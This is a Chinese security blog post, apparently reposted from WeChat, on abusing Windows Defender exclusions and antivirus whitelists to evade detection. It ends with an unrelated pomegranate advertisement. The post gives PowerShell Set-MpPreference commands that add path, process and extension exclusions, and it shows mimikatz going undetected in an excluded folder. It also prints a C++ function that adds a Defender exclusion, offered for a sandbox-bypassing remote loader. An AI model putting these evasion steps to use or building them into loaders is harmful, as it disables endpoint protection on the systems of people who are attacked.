知白守黑:防病毒软件的致命弱点—排除项与白名单

admin 2024年9月29日21:27:19评论11 views字数 1515阅读5分3秒阅读模式

排除项

防病毒 (AV) 和端点检测与响应 (EDR) 解决方案是现代网络安全防御的重要组成部分。主要用在保护系统免受恶意活动的侵害。然而,它们并不完美,有时会干扰合法操作,导致误报或性能影响。所以,所有安全产品都会包含一项名为“信任区/排除项”的附加功能,用于忽略特定资产,例如路径、进程、文件和扩展名。

技术是把双刃剑,虽然此项功能实现了优化性能和减少误报,但同时也变相为攻击者提供了一个静默绕过的攻击面。滥用排除项可以成为一种强大而隐蔽的逃避检测的技术

知白守黑:防病毒软件的致命弱点—排除项与白名单

Windows 操作系统中默认使用的Windows Defender AV为例

Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionProcess, ExclusionExtension

滥用基于文件夹的排除

mimikatz在下载到非排除文件夹后立即被检测并删除

知白守黑:防病毒软件的致命弱点—排除项与白名单

Set-MpPreference -ExclusionPath "C:WindowsTemp"

排除文件夹中执行相同操作时,Defender将变得鸦雀无声

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

滥用基于进程的排除

当你将某个进程添加到进程排除列表时,无论文件位于何处,Microsoft Defender Antivirus 都不会扫描该进程打开的文件https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus

Set-MpPreference -ExclusionProcess "java.exe"

滥用基于扩展的排除

同上

Set-MpPreference -ExclusionExtension ".sec"

以上,这种攻击媒介我们可以添加到我们的BYPASS沙箱上线的远程加载器里

//添加Windows defender 排除项void AddDefenderExclusion(const std::string& path) {    std::cout << "Adding Windows Defender exclusion for " << path << std::endl;    std::string command = "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"" + path + "\""";    system(command.c_str());}

知白守黑:防病毒软件的致命弱点—排除项与白名单

白名单

说完了排除项我们来看白名单,这就是字符串杀软的魅力吗

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

以上,懂得都懂。甚至可以利用白进程轻松Kill:https://bbs.kanxue.com/thread-281120.htm

知白守黑:防病毒软件的致命弱点—排除项与白名单

总结:

在现代网络安全中,排除项和白名单的功能虽然在优化性能和减少误报方面表现出色,但同时也给攻击者留下了可乘之机。

正如在网络安全中需要谨慎选择信任的元素,我们在生活中也同样需要关注选择,以提升我们的精力和专注力。在这个过程中,健康的饮食至关重要。比如,石榴不仅美味可口,还富含抗氧化剂,能够有效提高我们的能量水平,帮助我们在学习和工作时更加集中。

因此,当你在处理复杂问题时,不妨尝试加入石榴,让它为你的思维注入活力,帮助你在网络安全世界中更加敏锐和高效。

某学员家自己种的石榴,突尼斯软籽石榴,顺丰包邮

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

知白守黑:防病毒软件的致命弱点—排除项与白名单

点此链接购买:https://shop.zhongkrg.cn/pages/goods_details/index?id=58

原文始发于微信公众号(老鑫安全):知“白”守黑:防病毒软件的致命弱点—排除项与白名单

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月29日21:27:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   知白守黑:防病毒软件的致命弱点—排除项与白名单http://cn-sec.com/archives/3219616.html

发表评论

匿名网友 填写信息